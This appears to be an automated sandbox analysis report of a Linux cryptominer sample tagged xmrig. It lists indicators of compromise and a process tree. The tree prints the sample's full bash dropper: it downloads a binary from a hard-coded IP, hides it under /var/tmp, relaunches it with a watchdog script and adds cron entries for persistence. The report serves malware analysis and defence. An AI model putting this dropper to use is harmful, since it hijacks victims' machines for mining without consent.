xmrig | 32ef08fa6f3819b255ddd3d4d77c63c17058e77550c217ae1714d0679f62802d

execution persistence privilege_escalatio

Processes:

.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system.report_system

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.XYfJjN	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads hardware information 1 TTPs 64 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

Processes:

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system

Checks CPU configuration 1 TTPs 55 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

Processes:

description	ioc	Process
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

Processes:

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/thread_siblings	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_siblings	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/online	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/thread_siblings	.report_system
File opened for reading	/sys/devices/system/cpu/possible	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

Processes:

description	ioc	Process
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	.report_system
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	.report_system
File opened for reading	/sys/devices/virtual/dmi/id	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/system/node/node0/meminfo	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	.report_system
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	.report_system
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	.report_system
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/cpumap	.report_system
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	Process
File opened for reading	/proc/680/cmdline	pgrep
File opened for reading	/proc/163/status	pgrep
File opened for reading	/proc/1305/cmdline	pgrep
File opened for reading	/proc/469/status	pgrep
File opened for reading	/proc/1305/status	pgrep
File opened for reading	/proc/20/status	pgrep
File opened for reading	/proc/28/status	pgrep
File opened for reading	/proc/1068/cmdline	pgrep
File opened for reading	/proc/969/status	pgrep
File opened for reading	/proc/180/cmdline	pgrep
File opened for reading	/proc/1066/status	pgrep
File opened for reading	/proc/1357/cmdline	pgrep
File opened for reading	/proc/1078/status	pgrep
File opened for reading	/proc/1812/status	pgrep
File opened for reading	/proc/1062/cmdline	pgrep
File opened for reading	/proc/908/cmdline	pgrep
File opened for reading	/proc/715/status	pgrep
File opened for reading	/proc/641/status	pgrep
File opened for reading	/proc/1289/status	pgrep
File opened for reading	/proc/322/cmdline	pgrep
File opened for reading	/proc/164/status	pgrep
File opened for reading	/proc/518/status	pgrep
File opened for reading	/proc/428/cmdline	pgrep
File opened for reading	/proc/30/cmdline	pgrep
File opened for reading	/proc/1152/status	pgrep
File opened for reading	/proc/551/status	pgrep
File opened for reading	/proc/1252/status	pgrep
File opened for reading	/proc/488/status	pgrep
File opened for reading	/proc/425/status	pgrep
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/7/status	pgrep
File opened for reading	/proc/169/status	pgrep
File opened for reading	/proc/683/status	pgrep
File opened for reading	/proc/962/cmdline	pgrep
File opened for reading	/proc/1253/status	pgrep
File opened for reading	/proc/953/status	pgrep
File opened for reading	/proc/516/status	pgrep
File opened for reading	/proc/1163/status	pgrep
File opened for reading	/proc/1139/cmdline	pgrep
File opened for reading	/proc/98/cmdline	pgrep
File opened for reading	/proc/1329/status	pgrep
File opened for reading	/proc/166/status	pgrep
File opened for reading	/proc/1321/status	pgrep
File opened for reading	/proc/20/status	pgrep
File opened for reading	/proc/34/cmdline	pgrep
File opened for reading	/proc/25/cmdline	pgrep
File opened for reading	/proc/1499/cmdline	pgrep
File opened for reading	/proc/34/status	pgrep
File opened for reading	/proc/1068/cmdline	pgrep
File opened for reading	/proc/34/cmdline	pgrep
File opened for reading	/proc/34/status	pgrep
File opened for reading	/proc/1176/cmdline	pgrep
File opened for reading	/proc/1068/cmdline	pgrep
File opened for reading	/proc/683/status	pgrep
File opened for reading	/proc/1029/cmdline	pgrep
File opened for reading	/proc/468/cmdline	pgrep
File opened for reading	/proc/208/cmdline	pgrep
File opened for reading	/proc/31/status	pgrep
File opened for reading	/proc/425/cmdline	pgrep
File opened for reading	/proc/1376/status	pgrep
File opened for reading	/proc/1086/status	pgrep
File opened for reading	/proc/680/status	pgrep
File opened for reading	/proc/644/status	pgrep
File opened for reading	/proc/1305/cmdline	pgrep

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

bash

description	ioc	Process
File opened for modification	/tmp/sh-thd.uBxSvB	bash

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1496

/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"\$@\"" /tmp/.main.elf
1⤵
PID:1496

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:1496

/bin/bash
/tmp/.main.elf -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://66.63.187.200/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system> /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/.main.elf
1⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:1496
- /bin/mkdir
  mkdir /var/tmp/.rcu_gp
  2⤵
  PID:1497
- /usr/bin/wget
  wget http://66.63.187.200/.puscarie/.report_system -O .report_system
  2⤵
  PID:1498
- /bin/chmod
  chmod +x .report_system
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /bin/cat
  cat
  2⤵
  PID:1512
- /bin/chmod
  chmod +x /var/tmp/.rcu_gp/diicot
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /bin/grep
  grep -q .main
  2⤵
  PID:1515
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1514
- /bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1516
- /bin/sleep
  sleep 1
  2⤵
  PID:1517
- /bin/sleep
  sleep 1
  2⤵
  PID:1518
- /bin/sleep
  sleep 1
  2⤵
  PID:1519
- /usr/bin/crontab
  crontab /var/tmp/.rcu_gp/.ps5
  2⤵
  - Creates/modifies Cron job
  PID:1520
- /bin/sleep
  sleep 1
  2⤵
  PID:1521
- /bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:1522
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1524
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1525
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1526
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1528
- /bin/grep
  grep -q .main
  2⤵
  PID:1529
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1530
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1536
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1537
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1538
- /bin/grep
  grep -q .main
  2⤵
  PID:1541
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1540
- /bin/sleep
  sleep 2.5
  2⤵
  PID:1542
- /bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1548
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
